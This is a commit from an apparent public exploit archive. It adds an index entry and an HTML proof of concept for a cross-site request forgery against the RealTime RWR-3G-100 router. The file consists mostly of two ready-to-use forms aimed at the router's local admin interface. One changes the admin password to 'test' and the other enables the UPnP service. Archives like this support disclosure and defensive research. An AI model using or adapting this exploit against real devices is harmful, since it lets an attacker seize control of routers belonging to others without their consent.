DB: 2017-08-14

1 new exploits RealTime RWR-3G-100 Router - Cross-Site Request Forgery (Change Admin Password)
2017-08-14 05:01:19 +00:00 · 2017-08-14 05:01:19 +00:00 · 26466c9d62
commit 26466c9d62
parent 89822ebf5d
2 changed files with 65 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -38250,3 +38250,4 @@ id,file,description,date,author,platform,type,port
 42446,platforms/php/webapps/42446.txt,"DeWorkshop 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",php,webapps,0
 42447,platforms/php/webapps/42447.txt,"De-Journal 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",php,webapps,0
 42448,platforms/php/webapps/42448.txt,"De-Tutor 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",php,webapps,0
+42449,platforms/hardware/webapps/42449.html,"RealTime RWR-3G-100 Router - Cross-Site Request Forgery (Change Admin Password)",2017-08-12,"Touhid M.Shaikh",hardware,webapps,0
--- a/platforms/hardware/webapps/42449.html
+++ b/platforms/hardware/webapps/42449.html
@ -0,0 +1,64 @@
+<!--
+# Exploit Title: RealTime RWR-3G-100 Router Cross-Site Request Forgery
+(Change Admin Password)
+# Date: 13 Aug, 2017
+# Vendor Homepage : http://www.rtsindia.com/
+# Vendor Contact : https://www.linkedin.com/company/realtime-system-ltd.
+# Firmware Version : Ver1.0.56
+# Exploit Author: Touhid M.Shaikh
+# Contact: https://github.com/touhidshaikh
+# Website: http://touhidshaikh.com/
+
+
+===================
+Product Description
+===================
+Provides Wireless/ Wired Broadband connectivity to SOHO & SME. Provides
+Broadband connectivity to multiple users on the move.Uses 3G/2.75G USB
+Dongle to get connected to Broadband/ Optionally Uses Wired Broadband
+connectivity. Supports HSPA, EVDO, UMTS, HSDPA & HSUPA USB Dongles and
+Compatible with Blackberry & iPhone. Creates 802.11n Wi-Fi Hotspot for
+Multiple Users to get connected to Broadband. Small & Sleek Portable
+Router, Easy to Install & Manage.
+-->
+
+
+
+<!-- CHANGE ADMIN PASSWORD to test-->
+<form action=http://192.168.1.1/goform/formPasswordSetup method=POST
+name="password">
+    <input type="text" name="username" value="admin">
+    <input type="password" name="newpass" value="test">
+    <input type="password" name="confpass" value="test">
+    <input type="hidden" value="/status.asp" name="submit-url">
+    <input type="submit" value="Apply Changes" name="save">
+  <input type="reset" value="  Reset  " name="reset" id="password Reset">
+</form>
+<!-- CHANGE ADMIN PASSWORD Ends here-->
+
+
+<!---Enable The UPNP Service-->
+<form action=http://192.168.1.1/goform/formUpnpSetup method=POST
+name="upnpSetup">
+  <input type="radio" name="upnpfunction" id="upnpfunctiony" value="yes"
+checked>
+  <input type="radio" name="upnpfunction" id="upnpfunctionn" value="no" >
+
+<!--
+  <input type="radio" name="avupnpfunction" id="avupnpfunctiony"
+value="yes" checked>
+  <input type="radio" name="avupnpfunction" id="avupnpfunctionn" value="no"
+>
+-->
+  <input type="submit" value="Apply Changes" name="save" id="upnp apply" >
+  <input type="reset" value="  Reset  " name="reset" id="upnp Reset">
+  <input type="hidden" value="/upnp.asp" name="submit-url">
+</form>
+<!---Enable The UPNP Service Ends here-->
+
+
+
+<!--
+======GREEtZ=====
+my cool Broo and Pratik K.tjani
+-->